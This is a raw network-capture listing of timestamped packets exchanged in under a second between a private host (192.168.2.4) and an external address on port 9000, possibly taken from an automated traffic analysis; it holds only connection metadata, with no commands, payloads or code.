May 19, 2024 09:09:08.218652010 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.218849897 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.219830036 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.219890118 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.223318100 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.223381042 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.224267960 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.224441051 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.225191116 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.225250006 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.229003906 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.229075909 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.229877949 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.230051994 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.230912924 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.230971098 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.234348059 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.234414101 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.235209942 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.235397100 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.236263037 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.236321926 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.240015984 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.240072966 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.240919113 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.240966082 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.241852045 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.241903067 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.245302916 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.245356083 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.246283054 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.246345997 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.247179985 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.247235060 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.249265909 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.249314070 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.249933958 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.249980927 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.251945972 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.251992941 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.252079964 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.252121925 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.253340960 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.253393888 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.255500078 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.255548954 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.256356955 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.256373882 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.256412029 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.256453037 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.257420063 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.257477045 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.259533882 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.259592056 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.259828091 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.259881973 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.262151003 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.262207031 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.262628078 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.262787104 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.263145924 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.263202906 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.265815020 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.265878916 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.266567945 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.266582966 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.266732931 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.266732931 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.267191887 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.267250061 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.269306898 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.269368887 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.269748926 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.269799948 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.271985054 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.272042036 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.272718906 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.272783995 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.273082018 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.273133039 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.276062965 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.276079893 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.276175976 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.276175976 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.276500940 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.276683092 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.277889013 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.277904034 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.277956963 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.279366016 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.279422998 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.279751062 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.279805899 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.282674074 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.282733917 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.286530972 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.286611080 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.287034035 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.287096024 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.287807941 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.287864923 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.288618088 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.288640022 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.288674116 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.288710117 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.289578915 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.289633036 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.290240049 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.290293932 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.293183088 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.293199062 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.293243885 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.293764114 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.293777943 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.293961048 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.294090033 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.294152975 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.296673059 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.296731949 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.297068119 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.297085047 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.297127008 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.297163963 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.298489094 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.298543930 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.300283909 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.300340891 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.300684929 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.300735950 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.303098917 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.303155899 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.303600073 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.303616047 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.303780079 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.303780079 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.304372072 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.304385900 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.304434061 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.306804895 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.306860924 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.307250977 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.307306051 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.309115887 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.309171915 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.309766054 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.309824944 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.310225964 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.310281992 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.313179970 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.313374043 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.313704967 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.313720942 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.313878059 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.313878059 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.314429998 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.314444065 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.314495087 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.316709042 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.316765070 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.317066908 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.317123890 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.320024014 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.320080996 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.320506096 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.320521116 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.320705891 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.320705891 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.321281910 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.321341991 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.322870016 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.322927952 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.323312044 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.323367119 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.326092958 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.326111078 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.326159000 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.326543093 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.326695919 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.327341080 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.327356100 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.327411890 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.327452898 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.329261065 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.329336882 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.329691887 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.329752922 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.332066059 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.332081079 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.332140923 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.332330942 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.332493067 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.332972050 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.333137035 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.335380077 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.335443020 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.335901022 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.335916996 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.336069107 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.336069107 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.336839914 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.336904049 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.338354111 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.338428974 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.338710070 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.338773012 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.341262102 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.341346979 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.341795921 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.341831923 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.341996908 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.341996908 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.342521906 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.342593908 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.344690084 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.344772100 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.345112085 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.345175028 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.347194910 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.347275972 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.347593069 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.347630978 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.347661018 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.347697020 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.348387003 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.348443031 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.350084066 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.350158930 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.350488901 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.350548983 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.352843046 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.352912903 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.353564978 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.353599072 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.353741884 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.353741884 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.354043007 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.354075909 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.354100943 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.354139090 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.355623007 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.355686903 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.356024027 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.356086969 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.358850002 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.358916998 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.358980894 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.359178066 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.359688997 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.359749079 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.360424042 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.360486031 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.361222982 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.361257076 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.361283064 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.361315966 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.362274885 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.362339973 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.362732887 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.362790108 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.363579035 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.363614082 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.363641024 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.363675117 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.364461899 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.364522934 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.364856958 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.364912033 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.366556883 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.366617918 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.366995096 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.367028952 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.367054939 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.367088079 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.368355989 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.368417978 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.368834019 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.368891954 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.369124889 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.369182110 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.370706081 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.370764017 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.371032000 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.371067047 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.371093988 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.371126890 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.372565031 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.372627974 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.372864008 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.372921944 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.373408079 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.373440981 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.373459101 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.373492956 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.374507904 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.374572039 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.374797106 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.374855042 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.376462936 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.376523972 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.376730919 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.376765013 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.376796007 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.376833916 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.378196955 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.378230095 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.378257036 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.378288031 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.378391981 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.378448963 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.378827095 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.378886938 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.380142927 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.380207062 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.380434036 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.380466938 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.380494118 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.380527020 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.382121086 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.382198095 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.382226944 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.382260084 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.382436037 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.382508039 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.382988930 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.383021116 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.383049965 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.383081913 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.384049892 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.384125948 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.384377003 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.384434938 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.385648966 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.385706902 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.385972977 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.386007071 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.386038065 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.386070967 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.387666941 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.387706041 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.387728930 CEST	49750	9000	192.168.2.4	116.202.5.235
